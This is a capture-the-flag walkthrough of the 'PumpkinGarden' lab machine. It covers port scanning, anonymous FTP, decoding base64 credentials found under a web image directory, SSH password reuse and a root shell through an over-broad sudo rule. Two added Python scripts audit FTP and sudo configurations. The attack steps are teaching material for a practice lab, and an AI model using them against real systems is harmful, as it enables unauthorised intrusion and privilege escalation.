PumpkinGarden Box


Information Gathering

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.141
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 05:37 EDT
Nmap scan report for 192.168.56.141
Host is up (0.00022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
1515/tcp open ifor-protocol
3535/tcp open ms-la
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)

Ports 21, 1515 and 3535 are open.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo nmap -sT -sV -sC -O -p21,1515,3535 192.168.56.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 05:42 EDT
Nmap scan report for 192.168.56.141
Host is up (0.00048s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 2019 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
| 2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
| 256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_ 256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

FTP allows anonymous login, 1515 is the web service port, 3535 is the SSH port, and the operating system is Ubuntu.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo nmap --script=vuln -p21,1515,3535 192.168.56.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 05:45 EDT
Nmap scan report for 192.168.56.141
Host is up (0.00050s latency).

PORT STATE SERVICE
21/tcp open ftp
1515/tcp open ifor-protocol
3535/tcp open ms-la
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)

The vulnerability scripts turned up nothing, so next let's look at the files available after an anonymous FTP login.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ftp 192.168.56.141
Connected to 192.168.56.141.
220 Welcome to Pumpkin's FTP service.
Name (192.168.56.141:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||12463|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 88 Jun 13 2019 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||54151|).
150 Opening BINARY mode data connection for note.txt (88 bytes).
100% |***********************************************************************| 88 42.50 KiB/s 00:00 ETA
226 Transfer complete.
88 bytes received in 00:00 (34.22 KiB/s)
ftp> pwd
Remote directory: /
ftp> ls -liah
229 Entering Extended Passive Mode (|||54091|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 113 4096 Jun 11 2019 .
drwxr-xr-x 2 0 113 4096 Jun 11 2019 ..
-rw-r--r-- 1 0 0 88 Jun 13 2019 note.txt
226 Directory send OK.
ftp> exit
421 Timeout.

Download it locally and view it.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat note.txt
Hello Dear!
Looking for route map to PumpkinGarden? I think jack can help you find it.

This gives us a username, jack, and mentions a route map (a site path map?), but there is no further information.
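The scan output above shows the two conditions that make note.txt readable by anyone: anonymous login is allowed and the control connection is plain text. The following Python audit is an added example, not code from the original post: it parses a vsftpd.conf and flags those settings (plus writable anonymous access and a missing chroot for local users, which is relevant later when the goblin account can browse above its home directory). The option names and their defaults are taken from vsftpd.conf(5); the two sample configs it runs on are constructed for illustration.

```python
"""Audit a vsftpd.conf for the exposure seen on this box (added example)."""

# vsftpd treats a missing key as its compiled-in default; these are the
# defaults documented in vsftpd.conf(5) for the keys checked below.
DEFAULTS = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "ssl_enable": "NO",
    "chroot_local_user": "NO",
}

# vsftpd accepts YES/TRUE/1 (case-insensitive) for boolean options.
TRUE_VALUES = {"yes", "true", "1"}


def parse_vsftpd(text):
    """Return a dict of option -> value from vsftpd.conf text.

    Blank lines and '#' comment lines are ignored; option names are
    case-insensitive in vsftpd, so they are lower-cased here.
    """
    options = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue  # vsftpd itself rejects such a line; do not guess
        options[key.strip().lower()] = value.strip()
    return options


def enabled(options, key):
    """True if a boolean option is on, applying vsftpd's default when absent."""
    value = options.get(key, DEFAULTS.get(key, "NO"))
    return value.lower() in TRUE_VALUES


def audit_vsftpd(text):
    """Return a list of finding strings; an empty list means nothing flagged."""
    opts = parse_vsftpd(text)
    findings = []
    if enabled(opts, "anonymous_enable"):
        findings.append("anonymous_enable is on: unauthenticated users can read the FTP root")
        if enabled(opts, "anon_upload_enable") or enabled(opts, "anon_mkdir_write_enable"):
            findings.append("anonymous users can also write files")
    if not enabled(opts, "ssl_enable"):
        findings.append("ssl_enable is off: credentials and data travel in plaintext")
    if not enabled(opts, "chroot_local_user"):
        findings.append("chroot_local_user is off: local users can browse outside their home")
    return findings


# Constructed sample configs. The first reproduces what nmap reported above
# (anonymous login allowed, plaintext connection); the second is a hardened
# counterpart.
WEAK_CONF = """\
# vsftpd.conf (constructed example)
listen=YES
anonymous_enable=YES
local_enable=YES
"""

HARDENED_CONF = """\
# vsftpd.conf (constructed example)
listen=YES
anonymous_enable=NO
local_enable=YES
chroot_local_user=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit_vsftpd(conf) or ["no findings"]:
            print("  -", finding)
```

Note that a config which never mentions anonymous_enable is flagged too, because vsftpd's compiled-in default is YES; the check is on the effective value, not on whether the key was written down.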

Web Inspection

Take a look at the web service page.

The page does not look special; the bold text is noted for later. Trying the word hood as a path also returns a 404, so let's look at the page source.

The source mentions an img directory, so inspect the img directory while running a directory brute-force at the same time.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo gobuster dir -u http://192.168.56.141:1515/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,sql,tar,php
[sudo] password for kali:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.141:1515/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: txt,html,sql,tar,php
[+] Timeout: 10s
===============================================================
2023/09/12 06:50:46 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 287]
/.html (Status: 403) [Size: 288]
/index.html (Status: 200) [Size: 903]
/img (Status: 301) [Size: 320] [--> http://192.168.56.141:1515/img/]
/.html (Status: 403) [Size: 288]
/.php (Status: 403) [Size: 287]
/server-status (Status: 403) [Size: 296]
Progress: 1321045 / 1323366 (99.82%)
===============================================================
2023/09/12 06:54:28 Finished
===============================================================

The brute-force finds nothing, but viewing the /img page directly gives a pleasant surprise.

Enter hidden_secret/ and there is a single file; opening it shows an encoded string.

Try decoding it.

Unexpectedly, plain base64 decoding works directly:

scarecrow : 5Qn@$y

FTP User Login

Try logging in to FTP with this credential.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ftp 192.168.56.141
Connected to 192.168.56.141.
220 Welcome to Pumpkin's FTP service.
Name (192.168.56.141:kali): scarecrow
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||64848|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 167 Jun 11 2019 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||39844|).
150 Opening BINARY mode data connection for note.txt (167 bytes).
100% |***********************************************************************| 167 77.62 KiB/s 00:00 ETA
226 Transfer complete.
167 bytes received in 00:00 (59.41 KiB/s)
ftp> exit
221 Goodbye.

View the downloaded note.txt file.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat note.txt

Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.

Guessing that goblin here is a username gives us another credential pair, so try logging in to FTP again.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ftp 192.168.56.141
Connected to 192.168.56.141.
220 Welcome to Pumpkin's FTP service.
Name (192.168.56.141:kali): goblin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -liah
229 Entering Extended Passive Mode (|||26945|).
150 Here comes the directory listing.
drwx------ 2 1002 1002 4096 Jun 13 2019 .
drwxr-xr-x 5 0 0 4096 Jun 11 2019 ..
-rw------- 1 1002 1002 32 Jun 11 2019 .bash_history
-rw-r--r-- 1 1002 1002 231 Jun 11 2019 .bash_logout
-rw-r--r-- 1 1002 1002 3637 Jun 11 2019 .bashrc
-rw-r--r-- 1 1002 1002 675 Jun 11 2019 .profile
-rw-r--r-- 1 0 0 328 Jun 11 2019 note
226 Directory send OK.
ftp> pwd
Remote directory: /home/goblin
ftp> get .bash_history
local: .bash_history remote: .bash_history
229 Entering Extended Passive Mode (|||20033|).
150 Opening BINARY mode data connection for .bash_history (32 bytes).
100% |***********************************************************************| 32 16.19 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (10.47 KiB/s)
ftp> cd note
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||19069|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 328 Jun 11 2019 note
226 Directory send OK.
ftp> get note
local: note remote: note
229 Entering Extended Passive Mode (|||48158|).
150 Opening BINARY mode data connection for note (328 bytes).
100% |***********************************************************************| 328 449.87 KiB/s 00:00 ETA
226 Transfer complete.
328 bytes received in 00:00 (257.27 KiB/s)
ftp> cd /var/www/html
421 Timeout.
ftp> ls
Not connected.
ftp> exit

View the two downloaded files.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat .bash_history
cd
clear
sudo su
sudo namp
exit

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat note

Hello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.

Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh

The link in the note cannot be reached, so I searched around (searching for the site first showed it has been shut down; searching the file path directly then turned up a CVE number, and searching that CVE number in turn) and found that this is most likely a privilege escalation script.

So the next question is how to get inside the system: at minimum we need a shell before that script would be of any use (even though the script itself can no longer be found).

Password Reuse

Try the two credential pairs obtained so far directly for SSH login.

┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ssh goblin@192.168.56.141 -p 3535
The authenticity of host '[192.168.56.141]:3535 ([192.168.56.141]:3535)' can't be established.
ED25519 key fingerprint is SHA256:mLTE3ZDFS+c1wgTIsHLdH7jtZFKpYoPljQRHRdH7IVo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.141]:3535' (ED25519) to the list of known hosts.
------------------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
goblin@192.168.56.141's password:
Last login: Thu Jun 13 00:43:14 2019 from 192.168.1.106
goblin@Pumpkin:~$ whoami
goblin
goblin@Pumpkin:~$ id
uid=1002(goblin) gid=1002(goblin) groups=1002(goblin),27(sudo)
goblin@Pumpkin:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:20:a9:84 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.141/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe20:a984/64 scope link
valid_lft forever preferred_lft forever
goblin@Pumpkin:~$ sudo -l
[sudo] password for goblin:
Matching Defaults entries for goblin on Pumpkin:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goblin may run the following commands on Pumpkin:
(root) ALL, !/bin/su

Privilege Escalation

sudo -l gives a very interesting result: this user can run every command via sudo except su, which makes this easy.

goblin@Pumpkin:~$ sudo /bin/bash
root@Pumpkin:~# cd /root
root@Pumpkin:/root# ls
PumpkinGarden_Key
root@Pumpkin:/root# ls -alih
total 36K
131254 drwx------ 3 root root 4.0K Jun 13 2019 .
2 drwxr-xr-x 22 root root 4.0K Jun 11 2019 ..
164960 -rw-r--r-- 1 root root 22 Jun 13 2019 .bash_logout
131227 -rw-r--r-- 1 root root 3.1K Jun 11 2019 .bashrc
21448 drwx------ 2 root root 4.0K Jun 11 2019 .cache
142821 -rw------- 1 root root 17 Jun 13 2019 .nano_history
131226 -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
169390 -rw-r--r-- 1 root root 25 Jun 13 2019 PumpkinGarden_Key
164957 -rw-r--r-- 1 root root 66 Jun 11 2019 .selected_editor
root@Pumpkin:/root# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:/root# echo -n "Q29uZ3JhdHVsYXRpb25zIQ==" | base64 -d
Congratulations!root@Pumpkin:/root#
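The rule `(root) ALL, !/bin/su` is the root cause here: sudoers(5) notes that subtracting commands from ALL with `!` is generally not effective, and the session above confirms it with `sudo /bin/bash`. As an added example that is not part of the original post, the following Python script parses `sudo -l` output and flags exactly that pattern, plus NOPASSWD grants, so an administrator can catch it in a fleet audit. The first sample is the goblin output shown above; the second sample (user webadmin) is constructed, as is the parsing of tag and runas syntax, which follows the format sudo prints rather than a library API.

```python
"""Flag ineffective or over-broad sudo grants in `sudo -l` output (added example)."""
import re

# A rule line as printed by `sudo -l`: optional "(runas)" then the command list.
RULE_RE = re.compile(r"^\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<body>.+?)\s*$")
# Leading tags such as "NOPASSWD:" or "SETENV:" precede the command list.
TAG_RE = re.compile(r"^((?:[A-Z_]+:\s*)+)")


def parse_sudo_l(output):
    """Return a list of (runas, tags, commands) from `sudo -l` output.

    Only the block after "User X may run the following commands" is read;
    a blank line ends it. Commands are split on commas, which is how sudo
    separates them on one line (a comma inside a command argument is rare
    and not handled here).
    """
    rules = []
    in_rules = False
    for line in output.splitlines():
        if re.match(r"User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules:
            continue
        if not line.strip():
            break
        m = RULE_RE.match(line)
        # sudo always prints the runas in parentheses; fall back to root anyway.
        runas = (m.group("runas") or "").strip() or "root"
        body = m.group("body")
        tags = []
        t = TAG_RE.match(body)
        if t:
            tags = [x.strip(": ") for x in t.group(0).split() if x.strip(": ")]
            body = body[t.end():]
        commands = [c.strip() for c in body.split(",") if c.strip()]
        rules.append((runas, tags, commands))
    return rules


def audit_sudo_rules(rules):
    """Return finding strings for rules that grant more than they appear to."""
    findings = []
    for runas, tags, commands in rules:
        excluded = [c for c in commands if c.startswith("!")]
        if "ALL" in commands and excluded:
            findings.append(
                f"({runas}) ALL with exclusions {excluded}: sudoers(5) warns that "
                "subtracting commands from ALL with '!' is not effective, so the "
                "exclusion is not a restriction"
            )
        elif "ALL" in commands:
            findings.append(f"({runas}) ALL: the user is root-equivalent")
        if "NOPASSWD" in tags:
            findings.append(f"({runas}) NOPASSWD on {commands}: no password prompt")
    return findings


def audit_sudo_l(output):
    """Convenience wrapper: parse then audit."""
    return audit_sudo_rules(parse_sudo_l(output))


# Sample 1: the goblin output from the session above (indentation restored).
GOBLIN_SUDO_L = """\
Matching Defaults entries for goblin on Pumpkin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User goblin may run the following commands on Pumpkin:
    (root) ALL, !/bin/su
"""

# Sample 2: a constructed, narrowly scoped grant that should produce no findings.
WEBADMIN_SUDO_L = """\
User webadmin may run the following commands on Pumpkin:
    (root) /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    for name, output in (("goblin", GOBLIN_SUDO_L), ("webadmin", WEBADMIN_SUDO_L)):
        print(f"[{name}]")
        for finding in audit_sudo_l(output) or ["no findings"]:
            print("  -", finding)
```

The fix on the sudoers side is to list the commands the account actually needs, as in the webadmin sample, rather than granting ALL and trying to carve out su.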

Summary

Compared with the author's previous box, this one is much easier: there is no brute-force test, not even directory brute-forcing is needed, and there are no rabbit holes. Anyone with decent information-gathering skills should be able to take this box quickly.

Addendum: there were two credential pairs, and I was lucky to try the goblin user first and find that sudo -l allows privilege escalation. The scarecrow user can in fact also log in via SSH, but does not have the sudo -l privileges.


Source: https://i3eg1nner.github.io/2023/09/4f14f7be4ea4.html
Author: I3eg1nner
Published: 12 September 2023